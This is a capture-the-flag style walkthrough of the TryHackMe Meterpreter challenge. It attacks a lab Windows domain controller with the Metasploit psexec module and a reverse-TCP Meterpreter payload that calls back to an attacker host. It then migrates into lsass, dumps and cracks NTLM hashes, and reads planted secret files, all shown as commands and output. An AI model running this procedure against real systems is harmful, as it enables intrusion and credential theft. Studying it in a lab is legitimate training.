Metasploit: Meterpreter - Post-Exploitation Challenge [TryHackMe]
This is a quick walkthrough for the challenge portion of the Meterpreter Post-Exploitation Challenge in TryHackMe.
What we know / scope
We have an IP address and some creds.
Discovery & Scanning
Let’s see what else we can find. Let’s do a quick nmap scan:
sudo nmap -sV -vv 10.10.131.12 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-28 06:54 PDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 06:54
Scanning 10.10.131.12 [4 ports]
Completed Ping Scan at 06:54, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:54
Completed Parallel DNS resolution of 1 host. at 06:54, 0.00s elapsed
Initiating SYN Stealth Scan at 06:54
Scanning 10.10.131.12 [1000 ports]
Discovered open port 80/tcp on 10.10.131.12
Discovered open port 53/tcp on 10.10.131.12
Discovered open port 445/tcp on 10.10.131.12
Discovered open port 3389/tcp on 10.10.131.12
Discovered open port 139/tcp on 10.10.131.12
Discovered open port 135/tcp on 10.10.131.12
Discovered open port 88/tcp on 10.10.131.12
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 18.15% done; ETC: 06:55 (0:00:18 remaining)
Discovered open port 593/tcp on 10.10.131.12
Discovered open port 636/tcp on 10.10.131.12
Discovered open port 3268/tcp on 10.10.131.12
Discovered open port 3269/tcp on 10.10.131.12
Discovered open port 464/tcp on 10.10.131.12
Discovered open port 389/tcp on 10.10.131.12
Completed SYN Stealth Scan at 06:55, 8.23s elapsed (1000 total ports)
Initiating Service scan at 06:55
Scanning 13 services on 10.10.131.12
Completed Service scan at 06:55, 15.91s elapsed (13 services on 1 host)
NSE: Script scanning 10.10.131.12.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 06:55
Completed NSE at 06:55, 0.76s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 06:55
Completed NSE at 06:55, 0.69s elapsed
Nmap scan report for 10.10.131.12
Host is up, received echo-reply ttl 125 (0.17s latency).
Scanned at 2021-10-28 06:54:52 PDT for 26s
Not shown: 987 filtered ports
Reason: 987 no-responses
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2021-10-28 13:55:09Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
Service Info: Host: ACME-TEST; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.25 seconds
Raw packets sent: 1994 (87.712KB) | Rcvd: 17 (732B)
Ports 135, 139and 445 look very promising 🙂
Exploitation
Let’s try loading Metasploit msfconsole and leveraging the the exploit/windows/smb/psexec module:
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Now we should look at our options:
sf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github
.com/rapid7/metasploit-framework/wiki/
Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on t
arget for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authenti
cation
SMBPass no The password for the specified usernam
e
SMBSHARE no The share to connect to, can be an adm
in share (ADMIN$,C$,...) or a normal r
ead/write folder share
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process
, none)
LHOST x.x.x.x yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Now let’s go ahead and set the LHOST, RHOSTS, SMBUser, SMBPass:
# LHOST is your host IP
msf6 exploit(windows/smb/psexec) > set LHOST 1.2.3.4
LHOST => 1.2.3.4
# RHOSTS is the target host(s)
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.131.12
RHOSTS => 10.10.131.12
msf6 exploit(windows/smb/psexec) > set SMBUSer given_user
SMBUSer => given_user
msf6 exploit(windows/smb/psexec) > set SMBPass given_password
SMBPass => given_password
Now let’s go ahead and run it with the exploit keyword:
msf6 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 1.2.3.4:4444
[*] 10.10.131.12:445 - Connecting to the server...
[*] 10.10.131.12:445 - Authenticating to 10.10.131.12:445 as user 'ballen'...
[*] 10.10.131.12:445 - Selecting PowerShell target
[*] 10.10.131.12:445 - Executing the payload...
[+] 10.10.131.12:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.10.131.12
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 10.10.131.12:65160) at 2021-10-28 07:12:27 -0700
meterpreter >
Awesome, we are in! We now have a meterpreter session!
Post-Exploitation
System Information
Let’s gather some information about the system with the command sysinfo:
meterpreter > sysinfo
Computer : ACME-TEST
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : FLASH
Logged On Users : 8
Meterpreter : x86/windows
Lets answer a couple of the questions:
Computer name; ACME-TEST
Target domain: FLASH
Share Enumeration
Let’s check what shares are available:
Let’s background the session with CTRL+Z so we can leverage some of the other modules. Let’s list the open sessions to see what our session number is so we can use it in the near future:
msf6 exploit(windows/smb/psexec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ ACM 1.2.3.4:4444 -> 10.10
E-TEST .131.12:65160 (10.10.131.1
2)
In the future we can go back to this session using sessions -i #.
Now let’s use the post/windows/gather/enum_shares module to gather information about the shares available:
msf6 exploit(windows/smb/psexec) > back
msf6 > use post/windows/gather/enum_shares
msf6 post(windows/gather/enum_shares) > show options
Module options (post/windows/gather/enum_shares):
Name Current Setting Required Description
---- --------------- -------- -----------
CURRENT true yes Enumerate currently configured shares
ENTERED true yes Enumerate Recently entered UNC Paths in the Run Dia
log
RECENT true yes Enumerate Recently mapped shares
SESSION yes The session to run this module on.
We need to set the SESSION number. Let’s do that and run it:
msf6 post(windows/gather/enum_shares) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/enum_shares) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running against session 1
[*] The following shares were found:
[*] Name: SYSVOL
[*]
[*] Name: NETLOGON
[*]
[*] Name: speedster
[*]
[*] Post module execution completed
Answer Q: What is the name of the share likely created by the user?
speedster
Dump Hashes
Let’s get back to our meterpreter session:
msf6 post(windows/gather/enum_shares) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Our next step is to dump the hashes, first we need to migrate to the LSASS process. So let’s do that
meterpreter > getpid
Current pid: 1524
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Proce
ss]
4 0 System x64 0
68 4 Registry x64 0
400 4 smss.exe x64 0
492 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svc
host.exe
552 544 csrss.exe x64 0
624 616 csrss.exe x64 1
628 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svc
host.exe
640 544 wininit.exe x64 0
688 616 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\win
logon.exe
752 640 services.exe x64 0
764 640 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsa
ss.exe
828 752 svchost.exe x64 0 NT AUTHORITY\NETWORK S C:\Windows\System32\svc
ERVICE host.exe
840 688 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm
.exe
944 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svc
host.exe
Bingo, we found the lsass process with pid 764. Let’s move that process so we can proceed with our next assignment:
meterpreter > migrate 764
[*] Migrating from 1524 to 764...
[*] Migration completed successfully.
meterpreter >
Now from the lsass process we should be able to dump the hashes:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:5164d49b0ced05d3249842f7e420590e:::
Now, we could attempt to crack the hash our selves using something like John the Ripper or hashcat…..or….we coul leverage something like Crackstation.net. I chose the later, and what do you know:
Hash Type Result
69596c7aa1e8daee17f8e78870e25a5c NTLM Trustno1
That answers that question!
secrets.txt file
Now we have to answer 2 related questions about a secrets.txt file.
Let’s find it leveraging the meterpreter’s search feature:
meterpreter > search -f secrets.txt
Found 1 result...
c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt
Now that we have found the path, we can answer the location of the file quiestion.
Now let’s read the contents of the file:
meterpreter > cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt" (35 bytes)
My Twitter password is KDSvbsw3849!
realsecret.txt file
We have the last two questions related to this realsecret.txt file. We will use a similar technique from above to do so:
meterpreter > search -f realsecret.txt
Found 1 result...
c:\inetpub\wwwroot\realsecret.txt (34 bytes)
meterpreter > cat "c:\inetpub\wwwroot\realsecret.txt"
The Flash is the fastest man alive
RECAP
We were able to leverage the creds and the IP information to create a meterpreter session. From there we were able to gather information about the system, hashes which we can leverage for other activities such as lateral movement, and accessed data which we are able to use further in the process as well as exfiltrate it.